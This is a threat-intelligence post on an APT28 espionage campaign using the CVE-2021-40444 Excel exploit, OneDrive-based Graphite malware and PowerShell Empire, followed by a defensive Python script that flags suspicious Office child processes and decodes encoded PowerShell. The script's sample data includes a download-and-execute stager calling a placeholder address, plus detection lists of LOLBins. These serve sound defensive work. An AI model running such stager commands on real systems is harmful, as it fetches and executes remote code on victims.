A new multi-stage espionage campaign has been discovered targeting high-ranking government officials and individuals in the defense industry in Western Asia. The first signs of activity were seen as far back as June 2021, with more victims reporting attacks in September and October of the same year.
This campaign is notable in that it uses Microsoft OneDrive as its command-and-control (C2) channel, relying on the service’s synchronization feature to deliver encrypted commands for execution on the victim system. The initial infection vector is a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability tracked as CVE-2021-40444. Once the exploit runs on an unpatched system, it executes a second binary that acts as the downloader for the OneDrive-based stage of the malware, which has been dubbed Graphite. From there, Graphite has been observed downloading and executing PowerShell Empire as the final payload for post-exploitation activity.
Based on how the infrastructure, malware, and operation have been set up, the threat actor behind this campaign is believed to be the Russia-based APT28 group, also known as Fancy Bear. This group has been linked to numerous high-profile campaigns in recent years, including the intrusions related to the 2016 U.S. presidential election.
Properly patching and maintaining systems remains the most effective way to prevent vulnerabilities such as this one from being exploited. This is particularly true for vulnerabilities like CVE-2021-40444, which are rated critical because they are easy to trigger (here, by convincing a target to open a crafted Office document) and give the attacker code execution on the victim’s machine. It is equally important to deploy and maintain a capable endpoint detection and response (EDR) solution backed by proper logging. Tools like PowerShell Empire are well known and heavily signatured, so a good endpoint solution has a strong chance of blocking the final stage of this attack. Likewise, appropriate logging makes it possible to detect malware and attacker tooling by their behavior, such as anomalous parent/child process relationships and unexpected network activity, rather than by signature alone. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these types of detection needs.
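As an added example (not part of the original post and not Binary Defense’s tooling), the following Python triage script applies two of the logging-based checks recommended above to constructed process-creation events modelled loosely on the fields of Sysmon Event ID 1: an Office application spawning a command interpreter or Windows LOLBin, and a PowerShell launch carrying an -EncodedCommand argument, which the script decodes so an analyst can read the stager. The parent/child name lists, the sample command lines, file paths and the 203.0.113.7 address are constructed assumptions for the demonstration; the `-noP -sta -w 1 -enc` shape is the launcher PowerShell Empire’s default stager produces.

```python
"""Behavioural triage of process-creation events (constructed sample data)."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office parents that should rarely spawn interpreters or LOLBins directly.
# Both lists are heuristic assumptions for this example, not a vendor ruleset.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {
    "control.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
}

# powershell.exe accepts -EncodedCommand and its -e / -ec / -enc shorthands.
# Require a reasonably long base64 blob so "-e" alone does not fire on noise.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the creating process
    image: str          # full path of the newly created process
    command_line: str   # command line of the new process


def basename(path: str) -> str:
    """Lower-cased file name, tolerating either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none.
    PowerShell expects the blob to be base64 of UTF-16LE text."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave it for manual review


def office_spawned_lolbin(ev: ProcEvent) -> bool:
    """True when an Office application directly launches a suspicious child."""
    return basename(ev.parent_image) in OFFICE_PARENTS and \
        basename(ev.image) in SUSPICIOUS_CHILDREN


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (event index, reasons) for every event that trips a check."""
    findings = []
    for idx, ev in enumerate(events):
        reasons = []
        if office_spawned_lolbin(ev):
            reasons.append(f"{basename(ev.parent_image)} spawned {basename(ev.image)}")
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            reasons.append("encoded PowerShell: " + decoded[:80])
        if reasons:
            findings.append((idx, reasons))
    return findings


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stager text; 203.0.113.7 is an RFC 5737 documentation address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"

# Constructed events: a user opens a workbook, Excel spawns rundll32 on a DLL
# in Temp, that process launches an Empire-style encoded PowerShell launcher,
# and finally an ordinary admin script run that should NOT alert.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", _EXCEL,
              f'"{_EXCEL}" "C:\\Users\\u\\Downloads\\invoice.xlsx"'),
    ProcEvent(_EXCEL, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\u\AppData\Local\Temp\stage.dll,Start"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", _PS,
              f"powershell -noP -sta -w 1 -enc {_encode(STAGER)}"),
    ProcEvent(r"C:\Windows\explorer.exe", _PS,
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Run on the constructed events, the script flags event 1 (Excel launching rundll32) and event 2 (the decoded stager), while the benign `-ExecutionPolicy Bypass` invocation passes because the regex insists on whitespace after the flag. In production the same functions would be fed from Sysmon or EDR telemetry rather than the inline list, and the parent/child lists tuned against the environment’s baseline.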